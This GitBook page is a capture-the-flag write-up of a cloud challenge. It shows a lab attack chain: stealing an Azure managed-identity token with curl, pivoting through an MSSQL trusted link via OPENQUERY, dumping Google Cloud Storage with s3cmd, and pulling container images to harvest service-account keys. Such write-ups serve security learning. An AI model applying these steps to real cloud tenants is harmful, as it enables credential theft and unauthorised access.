Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page
  • Solve
  • TLDR
  • Reference

Was this helpful?

  1. 2025
  2. Thuderdome

Crossing the great divide

PreviousA new wave (web of deceit)NextJoining forces as one

Last updated 3 months ago

Was this helpful?

Solve

Within the same zip file, theres a initial-config.sql file. The file contains another set of credentials which we can add into our loot

From our prior enumeration, we know that the Virtual Machine has an system assigned management identity. Lets try and dump that.

With the identity endpoint and token, we are able curl to get the management api.

curl "http://127.0.0.1:41041/msi/token/?resource=https://management.azure.com/&api-version=2017-09-01" -H "Secret: 41F02D3D5B464799867FCD3897A16785"

With the access token, lets connect and enumerate Az Resources.

From the Get-AzResource output, we can see that theres a virtual machine running. Lets enumerate it more next.

Next, lets get the public IP address of the virtual machine and attempt to authenticate to it.

From the nmap output, we can see port 1433 is open, with ms-sql running on it. Lets attempt to use impacket to authenticate with the credentials we have.

Enumerating the sql server, I noticed that there is trusted link.

Now that we established that we managed to access the sql server via the trusted link. Lets enumerate it again.

SELECT * FROM OPENQUERY("34.74.254.28", 'SELECT table_name FROM bulkimport.INFORMATION_SCHEMA.TABLES WHERE table_type = ''BASE TABLE''');
SELECT COLUMN_NAME FROM OPENQUERY([34.74.254.28], 'SELECT COLUMN_NAME FROM bulkimport.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = ''myqueries''');
SELECT * FROM OPENQUERY([34.74.254.28], 'SELECT queries FROM [bulkimport].[dbo].[myqueries]');

From the output, we can see a reference to Google Cloud Storage. GCS has interoperability with Amazon S3. So lets use s3cmd to dump the files within the GCS.

First, we configure .s3cfg file with the following data.

We are able to then use s3cmd to interact with GCS as if its a normal S3 bucket.

From manual enumeration, only mp-bulk-insert and the gcf-v2-sources-454107766132-us-central1 bucket contains file. Lets download and inspect the data.

Looking at the bulkinsert.bcp and bulkinsert.fmt, it contains the format for the data to be inserted, as well as some PII data.

Next, looking at the zip file, upon unziping they both give the same file.

Looking at the source code, it is probably Google Cloud Function application, which contains hard coded Service account credentials.

Lets copy out the service account json, save it as analysis.json and authenticate with it.

From the output, it seems like analysis has alot of permissions over artifact registry. Artifact registry is basically a container registry similar to Docker Hub, but hosted on GCP.

Listing the repositories

Listing the images in the repositories mp-default

Configuring docker to refer to the Artifact Registries.

Pulling the docker images

Next, we will run the docker container to enumerate the filesystems.

docker run -it us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default/mp-seave@sha256:fc131d02bd19913bd3cbafc7c5d66c27af674ed99ea5a6c1522cca25075c417e /bin/bash

Looking at the /app directory there is another service account json for the service account automation.

Looking at the /root directory, we are able to retrieve the flag.

TLDR

  • Retrieve a db password from init-config.sql

  • Get Access Token for managed identity

  • Enumerate azure resources

  • Identify that there is a virtual machine running and retrieve the public IP Address

  • Perform nmap to identify open port and services

  • Utilize impacket mssqlclient to authenticate with the credentials from init-config.sql

  • Abuse trusted link to access another database on 34.74.254.28

  • Retrieve the GCS credentials from the database on 34.74.254.28

  • Authenticate to GCS and dump the files using s3cmd

  • Authenticate to gcloud with the analysisservice account json

  • Bruteforce for permissions using Bruteforce-GCP-Permissions

  • Identify that analysishas access to gcloud artifact registries

  • Enumerate and pull docker images from artifact registries

  • Retrieve automationservice account json from /app directory

  • Get the flag from the /root directory

Reference

  • https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md#mssql-trusted-links

Referring the , letst try and attempt to exploit the trusted link.

I will be using the tool to enumerate our permission.

payloadallthethings
Bruteforce-GCP-Permissions
https://cloud.google.com/storage/docs/interoperability
https://cloud.google.com/iam/docs/service-account-overview
https://github.com/carlospolop/Bruteforce-GCP-Permissions
https://cloud.google.com/artifact-registry/docs
https://cloud.google.com/sdk/gcloud/reference/artifacts/docker
initial-config.sql
Get-ChildItem env:
Retrieving access token
Connecting to Az with the access token
Listing Az Resource
Get-AzVM
Get-AzPublicIpAddress -ResourceGroupName SQLANALYSIS02_GROUP
nmap scan
trusted link
attempting to select the version on the server on 34.74.254.28
selecting table name
getting column name
Output of myqueries
.s3cfg file
Listing buckets
main.py
gcloud artifacts repositories list
gcloud artifacts docker images list us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default
gcloud auth configure-docker us-east1-docker.pkg.dev
docker pull us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default/mp-seave@sha256:fc131d02bd19913bd3cbafc7c5d66c27af674ed99ea5a6c1522cca25075c417e
automation service account